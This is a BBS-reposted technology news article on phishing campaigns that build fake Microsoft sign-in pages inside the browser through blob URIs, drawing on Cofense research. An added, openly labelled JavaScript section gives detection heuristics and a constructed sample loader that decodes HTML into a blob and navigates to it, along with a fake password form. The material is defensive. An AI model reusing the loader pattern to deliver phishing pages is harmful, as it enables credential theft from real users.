• Cybercriminals have found a sneaky way of stealing tax accounts a

    From TechnologyDaily@1337:1/100 to All on Saturday, May 10, 2025 22:45:08
    Cybercriminals have found a sneaky way of stealing tax accounts and even encrypted messages: here's what you need to know

    Date:
    Sat, 10 May 2025 21:33:00 +0000

    Description:
    A new phishing tactic loads fake login screens using blob URIs, letting attackers steal credentials without detection by firewalls, SEG tools, or AI filters.

    FULL STORY ======================================================================

    Bypasses email gateways and security tools by never hitting a real server
    Blob URIs mean phishing content isn't hosted online, so filters never see it coming
    No weird URLs, no dodgy domains, just silent theft from a fake Microsoft login page

    Security researchers have uncovered a series of phishing campaigns that use a rarely exploited technique to steal login credentials, even when those credentials are protected by encryption.

    New research from Cofense warns the method relies on blob URIs, a browser feature designed to display temporary local content, and cybercriminals are now abusing this feature to deliver phishing pages.

    Blob URIs are created and accessed entirely within a user's browser, meaning the phishing content never exists on a public-facing server. This makes it extremely difficult for even the most advanced endpoint protection systems to detect.

    A hidden technique that slips past defenses

    In these campaigns, the phishing process begins with an email that easily bypasses Secure Email Gateways (SEGs). These emails typically contain a link to what appears to be a legitimate page, often hosted on trusted domains such as Microsoft's OneDrive.

    However, this initial page doesn't host the phishing content directly. Instead, it acts as an intermediary, silently loading a threat-actor-controlled HTML file that decodes into a blob URI.

    The result is a fake login page rendered within the victim's browser, designed to closely mimic Microsoft's sign-in portal.

    To the victim, nothing seems out of place - no strange URLs or obvious signs of fraud - just a prompt to log in to view a secure message or access a document. Once they click Sign in, the page redirects to another attacker-controlled HTML file, which generates a local blob URI that displays the spoofed login page.

    Because blob URIs operate entirely within the browser's memory and are inaccessible from outside the session, traditional security tools are unable to scan or block the content.

    "This method makes detection and analysis especially tricky," said Jacob Malimban of the Cofense Intelligence Team.

    "The phishing page is created and rendered locally using a blob URI. It's not hosted online, so it can't be scanned or blocked in the usual way."

    Credentials entered on the spoofed page are silently exfiltrated to a remote threat actor endpoint, leaving the victim unaware.

    AI-based security filters also struggle to catch these attacks, as blob URIs are rarely used maliciously and may not be well-represented in training data. Researchers warn that unless detection methods evolve, this technique is likely to gain traction among attackers.
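
    The article describes an intermediary HTML file that decodes into a blob URI, and a login form rendered from that URI. The following JavaScript is an added example, not code from the article or from Cofense: it shows two defender-side heuristics, a static scan of fetched HTML for the decode-to-Blob-to-navigate pattern and a runtime check for password fields on blob: pages. The function names, signal list and sample inputs are assumptions constructed for illustration.

```javascript
// Added illustration: function names and sample inputs are hypothetical and constructed.

// Static signals that a fetched HTML/JS body builds a page locally and navigates to it.
const LOADER_SIGNALS = {
  decode: /\b(?:atob|decodeURIComponent|unescape|fromCharCode)\s*\(/,
  blobHtml: /new\s+Blob\s*\([\s\S]{0,400}?text\/html/i,
  objectUrl: /URL\s*\.\s*createObjectURL\s*\(/,
  navigate: /location(?:\.href)?\s*=[^=]|location\.(?:replace|assign)\s*\(|window\.open\s*\(|\.src\s*=[^=]/,
};

function scanLoader(body) {
  const hits = Object.keys(LOADER_SIGNALS).filter((k) => LOADER_SIGNALS[k].test(body));
  // An HTML blob that is turned into a URL and navigated to is the core pattern;
  // a decode step only raises confidence, since benign apps also create blobs.
  const core = ["blobHtml", "objectUrl", "navigate"].every((k) => hits.includes(k));
  return { hits, verdict: core ? (hits.includes("decode") ? "high" : "medium") : "none" };
}

// Runtime check for a browser extension or isolation proxy that can see the rendered page.
function assessRenderedPage(url, html) {
  const findings = [];
  if (!url.startsWith("blob:")) return findings;
  if (/<input\b[^>]*type\s*=\s*["']?password/i.test(html)) {
    findings.push("password field rendered from a blob: URL");
  }
  // blob:https://creator.example/<uuid> embeds the origin of the page that created it.
  let creator = null;
  try { creator = new URL(url.slice(5)).origin; } catch { /* opaque origin */ }
  // Only form actions are checked here; script-driven submission needs network telemetry.
  for (const m of html.matchAll(/\baction\s*=\s*["'](https?:\/\/[^"']+)["']/gi)) {
    const target = new URL(m[1]).origin;
    if (target !== creator) findings.push(`form posts to ${target}, not creator ${creator}`);
  }
  return findings;
}

// Constructed samples (inert: the encoded payload is a placeholder paragraph).
const sampleLoader = `<script>
  var html = atob("PHA+cGxhY2Vob2xkZXI8L3A+");
  var b = new Blob([html], {type: "text/html"});
  window.location.href = URL.createObjectURL(b);
</script>`;
const sampleBenign = `<script>
  var b = new Blob([csvText], {type: "text/csv"});
  link.href = URL.createObjectURL(b);
</script>`;
const sampleRendered = `<form action="https://collector.invalid/submit">
  <input type="password" name="p"></form>`;
```

    The static scan is a triage signal rather than a verdict, because legitimate web apps also build blobs for downloads and previews; the runtime check is the stronger of the two since sign-in forms are not normally served from blob: URLs.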

    To defend against such threats, organizations are urged to adopt advanced Firewall-as-a-Service (FWAAS) and Zero Trust Network Access (ZTNA) solutions that can help secure access and flag suspicious login activity.



    ======================================================================
    Link to news story: https://www.techradar.com/pro/cybercriminals-have-found-a-sneaky-way-of-stealing-tax-accounts-and-even-encrypted-messages-heres-what-you-need-to-know


    --- Mystic BBS v1.12 A47 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)